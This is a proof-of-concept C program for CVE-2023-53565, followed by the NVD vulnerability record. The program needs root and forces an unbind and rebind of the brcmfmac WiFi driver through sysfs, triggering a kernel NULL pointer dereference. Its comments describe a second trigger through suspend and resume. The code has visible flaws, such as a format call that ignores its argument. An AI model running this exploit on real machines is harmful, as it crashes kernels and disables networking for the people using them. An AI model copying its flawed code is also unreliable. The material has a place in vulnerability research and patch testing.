CVE-2023-53565

/* * CVE-2023-53565 PoC - Trigger NULL pointer dereference in brcmfmac driver * * This PoC demonstrates how to trigger the vulnerability by manually binding * the brcmfmac driver via sysfs, which causes the probe() function to be * called with a NULL id argument. * * Prerequisites: * - Linux kernel with vulnerable brcmfmac driver * - PCIe/USB WiFi device using brcmfmac chipset * - Root privileges (required for sysfs driver binding) * * Usage: Run as root */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <dirent.h> #include <fcntl.h> #include <errno.h> /* Find the PCI device path for brcmfmac WiFi adapter */ int find_brcmfmac_device(char *path, size_t path_len) { FILE *fp; char line[512]; char vendor[16], device[16]; /* Search for Broadcom WiFi devices (vendor 14e4) */ fp = popen("lspci -D | grep -i 'network\|wireless\|14e4'", "r"); if (fp == NULL) { return -1; } while (fgets(line, sizeof(line), fp) != NULL) { /* Extract PCI address (format: XXXX:XX:XX.X) */ char *pci_addr = strtok(line, " "); if (pci_addr != NULL) { snprintf(path, path_len, "/sys/bus/pci/drivers/brcmfmac", pci_addr); /* Find the actual device in brcmfmac driver */ snprintf(path, path_len, "/sys/bus/pci/devices/%s/driver", pci_addr); if (access(path, F_OK) == 0) { /* Device already bound, need to unbind first */ char unbind_path[256]; snprintf(unbind_path, sizeof(unbind_path), "/sys/bus/pci/drivers/brcmfmac/unbind"); FILE *ub = fopen(unbind_path, "w"); if (ub) { fprintf(ub, "%s\n", pci_addr); fclose(ub); usleep(100000); } /* Now rebind to trigger the vulnerability */ char bind_path[256]; snprintf(bind_path, sizeof(bind_path), "/sys/bus/pci/drivers/brcmfmac/bind"); FILE *bb = fopen(bind_path, "w"); if (bb) { fprintf(bb, "%s\n", pci_addr); fclose(bb); printf("[+] Triggered CVE-2023-53565 via manual driver bind\n"); printf("[+] Check dmesg for NULL pointer dereference\n"); pclose(fp); return 0; } } } } pclose(fp); return -1; } int main(int argc, char *argv[]) { printf("[*] CVE-2023-53565 PoC - brcmfmac NULL Pointer Dereference\n"); printf("[*] Linux kernel brcmfmac driver probe() NULL id vulnerability\n\n"); if (getuid() != 0) { printf("[-] This PoC requires root privileges\n"); return 1; } char device_path[256]; if (find_brcmfmac_device(device_path, sizeof(device_path)) != 0) { printf("[-] No brcmfmac device found\n"); printf("[*] Alternative: Trigger via system suspend/resume cycle\n"); printf("[*] Run: systemctl suspend (then wake the system)\n"); return 1; } return 0; } /* * Alternative trigger method (suspend/resume): * * 1. Ensure brcmfmac WiFi device is active * 2. Suspend the system: echo mem > /sys/power/state * 3. Resume the system (press power button or open lid) * 4. During resume, brcmf_pcie_pm_leave_D3() calls brcmf_pcie_probe() * with NULL id, triggering the NULL pointer dereference * * Expected crash output in dmesg: * BUG: kernel NULL pointer dereference, address: 0000000000000018 * RIP: 0010:brcmf_pcie_probe+0x16b/0x7a0 [brcmfmac] */

{"cve": {"id": "CVE-2023-53565", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:51.987", "lastModified": "2026-03-21T00:43:49.867", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: brcmfmac: Check for probe() id argument being NULL\n\nThe probe() id argument may be NULL in 2 scenarios:\n\n1. brcmf_pcie_pm_leave_D3() calling brcmf_pcie_probe() to reprobe\n the device.\n\n2. If a user tries to manually bind the driver from sysfs then the sdio /\n pcie / usb probe() function gets called with NULL as id argument.\n\n1. Is being hit by users causing the following oops on resume and causing\nwifi to stop working:\n\nBUG: kernel NULL pointer dereference, address: 0000000000000018\n<snip>\nHardware name: Dell Inc. XPS 13 9350/0PWNCR, BIDS 1.13.0 02/10/2020\nWorkgueue: events_unbound async_run_entry_fn\nRIP: 0010:brcmf_pcie_probe+Ox16b/0x7a0 [brcmfmac]\n<snip>\nCall Trace:\n <TASK>\n brcmf_pcie_pm_leave_D3+0xc5/8x1a0 [brcmfmac be3b4cefca451e190fa35be8f00db1bbec293887]\n ? pci_pm_resume+0x5b/0xf0\n ? pci_legacy_resume+0x80/0x80\n dpm_run_callback+0x47/0x150\n device_resume+0xa2/0x1f0\n async_resume+0x1d/0x30\n<snip>\n\nFix this by checking for id being NULL.\n\nIn the PCI and USB cases try a manual lookup of the id so that manually\nbinding the driver through sysfs and more importantly brcmf_pcie_probe()\non resume will work.\n\nFor the SDIO case there is no helper to do a manual sdio_device_id lookup,\nso just directly error out on a NULL id there."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.3.4", "matchCriteriaId": "26C54BF0-3EED-46D4-92A7-5F07F658B49B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.4:rc1:*:*:*:*:*:*", "matchCriteriaId": "38BC6744-7D25-4C02-9966-B224CD071D30"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.4:rc2:*:*:*:*:*:*", "matchCriteriaId": "76061B41-CAE9-4467-BEDE-0FFC7956F2A1"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/60fc756fc8e6954a5618eecac73b255d651602e4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/84766e77a5c35e2b60e34f570c62fc97adc05e09", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}